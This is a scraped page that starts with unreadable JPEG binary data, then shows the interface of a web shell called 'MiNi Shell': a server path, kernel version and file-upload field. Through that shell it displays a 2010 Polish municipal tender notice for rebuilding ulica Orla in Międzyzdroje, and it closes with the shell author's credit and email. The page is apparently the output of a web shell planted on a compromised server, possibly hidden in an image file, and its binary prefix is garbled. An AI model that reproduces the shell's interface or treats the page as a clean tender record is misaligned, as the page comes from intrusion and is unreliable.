JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101004/317204-N-2010.html

<p class="kh_header"><b>Międzyzdroje: Przebudowa drogi gminnej - ulicy Orlej w Międzyzdrojach wraz z  
        przebudową uzbrojenia terenu  i  oświetlenia ulicznego , przebudowa napowietrznej linii  
        energetycznej n.n. 0,4 kV kolidującej z przebudową ul. Orlej w Międzyzdrojach</b><br>
<b>Numer ogłoszenia: 317204 - 2010; data zamieszczenia: 04.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Międzyzdroje , ul. Książąt Pomorskich 5, 72-500 Międzyzdroje, tel. 091 3275652, faks 0913275630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miedzyzdroje.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi gminnej - ulicy Orlej w Międzyzdrojach wraz z  
        przebudową uzbrojenia terenu  i  oświetlenia ulicznego , przebudowa napowietrznej linii  
        energetycznej n.n. 0,4 kV kolidującej z przebudową ul. Orlej w Międzyzdrojach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi gminnej - ulicy Orlej w Międzyzdrojach   
       wraz z przebudową uzbrojenia terenu i oświetlenie ulicznego ,  przebudowa napowietrznej  
       linii energetycznej  n.n. 0,4 kV kolidującej z przebudową ul. Orlej w Międzyzdrojach .
       Ulica Orla jest ulicą lokalną typu ślepa. Od ulicy Gryfa Pomorskiego do zjazdu z ulicy   
       Polnej ulica Orla jest ulicą jednokierunkową. Na tym odcinku szerokość jezdni wynosi 
       3,00  m. Od zjazdu z ulicy Polnej do granicy działki nr 560/2 szerokość jezdni wynosi 
       4,50 m, na pozostałym odcinku 6,00 m. Jezdnia ulicy Orlej wykonana jest z płyt żelbetowych   
       pełnych. Chodnik jednostronny wykonany jest wzdłuż krawężnika na odcinku gdzie   
       usytuowane są domki jednorodzinne typu szeregowego, oraz na odcinku od ulicy Gryfa  
       Pomorskiego do lica budynku nr 2. Chodnik posiada nawierzchnię z płyt betonowych 
       50 x 50  cm i nawierzchnię betonową, zjazdy do garaży nawierzchnię betonową. 
       Teren zagospodarowany. Przeważają budynki jednorodzinne do dwóch kondygnacji  
       wybudowane w okresie powojennym.
       Wzdłuż ulic przebiega uzbrojenie podziemne - kable energetyczne, telefoniczne, sieci  
       kanalizacyjne, wodociągi oraz gazociągi. 
       Przewiduje się kompleksową przebudowę kanalizacji deszczowej, sanitarnej, sieci  
       wodociągowej i kabla oświetleniowego oraz budowę nowych nawierzchni ulic. 
       Ulicę Orlą zaprojektowano jako ulicę przelotową, jednokierunkową. Wjazd do ulicy Orlej  
       odbywać się będzie od strony ulicy Gryfa Pomorskiego i ulicy Polnej . Na całej długości 
       ulicy Orlej wprowadzono strefę zamieszkania. Od ulicy Gryfa Pomorskiego do granicy   
       działki nr 560/2 z uwagi na niewielką odległość w liniach regulacyjnych zaprojektowano 
       ciąg pieszo - jezdny. Szerokość pasa terenu przeznaczonego do ruchu pojazdów i pieszych 
       wynosi od 3,00  do 5, 50 m, na pozostałym odcinku chodnik jednostronny usytuowany przy 
       jezdni od strony  wejść do budynków mieszkalnych. Po przeciwnej stronie jezdni  
       zaprojektowano podłużne stanowiska postojowe dla samochodów osobowych. Parametry   
       techniczne stanowisk  postojowych przyjęto: szerokość 2,50 m , długość 6,00 m.
       Niweletę ulicy nawiązano do istniejących rzędnych jezdni ulicy Orlej i do rzędnych zjazdów
       oraz do dojść do posesji. Minimalne spadki podłużne niwelety ulicy Orlej wynoszą 0,5 % , 
       maksymalnie 0,7 %. Spadki poprzeczne jezdni z uwagi na istniejące uzbrojenie podziemne 
       przyjęto jednostronnie.                     
    


    
     Bilans terenu : 
     Drogi 
     Nawierzchnie utwardzone  - kostka betonowa szara 8x10x20 cm                    2650,0 m2
     Place i zatoki autobusowe, nawierzchnie utwardzone - kostka betonowa          
     czarna 8x10x20 cm                                                                                              396,2 m2 

    Ciągi piesze 
    Nawierzchnie utwardzone - kostka betonowa żółta 8x10x20 cm                         657, 0 m2
    Trawa                                                                                                                     213,5 m 2  

    Konstrukcje nawierzchni :
    Jezdnia 
    Kostka betonowa szara 8x10x20 cm                                8 cm 
    Podsypka cementowo- piaskowa 1: 4                              4 cm 
    Kamień łamany niesortowalny                                       20 cm 
                                                                         Razem          32 cm 

    Stanowiska postojowe 
    Kostka betonowa czarna 8x10x20                                       8 cm 
    Podsypka cementowo-piaskowa  1:4                                  4 cm 
    Kamień łamany niesortowalny                                           18 cm      
						  Razem             30 cm 

   Chodnik 
   Kostka betonowa żółta 8x10x20 cm                                      8 cm 
   Podsypka cementowo -piaskowa 1:4                                    4 cm 
   Kamień łamany niesortowalny                                             10 cm 
                                                                          Razem            22 cm 

  Krawężniki i obrzeża 
  Jezdnię należy obramować krawężnikiem betonowym 15x30 cm. Krawężnik powinien 
  wystawać nad jezdnią 10 cm, na zjazdach do garaży 3 cm, na przejściach dla pieszych 2 cm. 
  Chodniki obramować obrzeżem betonowym 6x20 cm.  

 Odwodnienie 
 Wody opadowe z powierzchni utwardzonej jezdni i chodników poprzez wpusty uliczne   
 odprowadzane będą do kanalizacji deszczowej. 

  Łączna długość projektowanych kanałów deszczowych i sanitarnych wynosi 1098,52 m. w tym 
  kanalizacja deszczowa 563,83 m , kanalizacja ściekowa 534,69 m. 

 Sieć wodociągowa zaprojektowana została z rur PE d = 125 mm klasy PE 100 PN  10 SDR 1711 
 koloru niebieskiego lub czarnego z niebieskim paskiem.
 Odgałęzienia wodociągowe zaprojektowano z rur PE d = 32-63 mm  klasy PE 80 PN 10 SDR 11 
 koloru niebieskiego  lub koloru czarnego z niebieskim paskiem. 
 Łączna długość wodociągu wynosi 585,05 m. 

 Zamówienie obejmuje budowę oświetlenia ulicznego ulicy Orlej w Międzyzdrojach.	

Zamówienie obejmuje również przebudowę napowietrznej linii elektroenergetycznej i oświetleniowej n.N.-0,4 kV w celu usunięcia kolizji tej linii z planowaną przebudowę 
ulicy Orlej w Międzyzdrojach w zakresie:
-  budowa linii kablowej n.n. 0,4 kV kablem typu YAKY 4x120 mm2 o długości całkowitej 
    trasy - 35 m;
-  montaż złącz i węzłów kablowych celem wprowadzenia istniejących odejść kablowych 
   od linii napowietrznej ;
-  wykonanie muf połączeniowych z przedłużanymi kablami,
-  demontaż istniejących słupów wraz z napowietrzną linią energetyczną i oświetleniową .
  
    Szczegółowy opis przedmiotu zamówienia stanowi załącznik do SIWZ - Projekt 
    budowlany  ,  specyfikacje techniczne wykonania i odbioru robót  oraz 
    przedmiary robót.
 Przedmiary robót są elementem pomocniczym służącym do wyceny przedmiotu 
 zamówienia.

Zamawiający dopuszcza zmiany postanowień zawartej umowy na warunkach określonych 
we wzorze umowy.
Wynagrodzenie za wykonanie przedmiotu zamówienia jest wynagrodzeniem ryczałtowym.
Od wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza 
               wymagane będzie wniesienie przed podpisaniem umowy zabezpieczenia należytego   
               wykonania umowy w wysokości:  5% ceny całkowitej (brutto) podanej w umowie.


kod CPV   45233300-2  45233200-1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.33.00-2, 45.23.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji w okresie ostatnich pięciu lat przed 
          upływem terminu składnia ofert , a jeżeli okres  prowadzenia działalności jest krótszy - w 
 tym okresie  co najmniej dwóch robót  budowlanych  w zakresie budowy, przebudowy dróg o wartości minimum 3 000 000,00 zł brutto każda , z  podaniem ich rodzaju i  wartości,   daty i miejsca wykonania oraz załączeniem  dokumentu potwierdzającego, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i  prawidłowo ukończone. 
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o   
       dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę dysponowanie  osobami : 
          * kierownik budowy - uprawnienia budowlane w specjalności drogowej bez                    
             ograniczeń,
          * kierownik robót sanitarnych - uprawnienia budowlane w specjalności 
             instalacyjnej w zakresie sieci instalacji i urządzeń wodociągowych i  
             kanalizacyjnych, wentylacyjnych, gazowych urządzeń cieplnych do kierowania 
             robotami budowlanymi,
          * kierownik robót elektrycznych - uprawnienia w specjalności instalacyjnej w 
              zakresie sieci i instalacji i urządzeń elektrycznych elektroenergetycznych.   
    
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o   
       dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Aktualne zaświadczenie o wpisie  do ewidencji działalności gospodarczej 
                 wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
      2.  Harmonogram rzeczowo - finansowy. 
      3.  Kosztorys ofertowy .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art.144 ustawy prawo zamówień publicznych może 
dokonać zmiany umowy jeżeli zmiany te są korzystne dla Zamawiającego oraz 
przedłużyć termin wykonania przedmiotu umowy o czas  opóźnienia , jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
- zawieszenia robót przez zamawiającego,
- wykopalisk uniemożliwiających wykonywanie robót, 
- szczególnie niesprzyjających warunków atmosferycznych,
- zmian dokumentacji projektowej, 
- siły wyższej. 
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu  
   zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te  
   zmiany są korzystne dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzyzdroje.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Międzyzdroje ulica Książąt Pomorskich 5 
72-500 Międzyzdroje.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 10:00, miejsce: w siedzibie zamawiającego
               Gmina Międzyzdroje 
               Ulica Książąt Pomorskich 5 
               72 -500 Międzyzdroje 
                Pokój nr 10 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com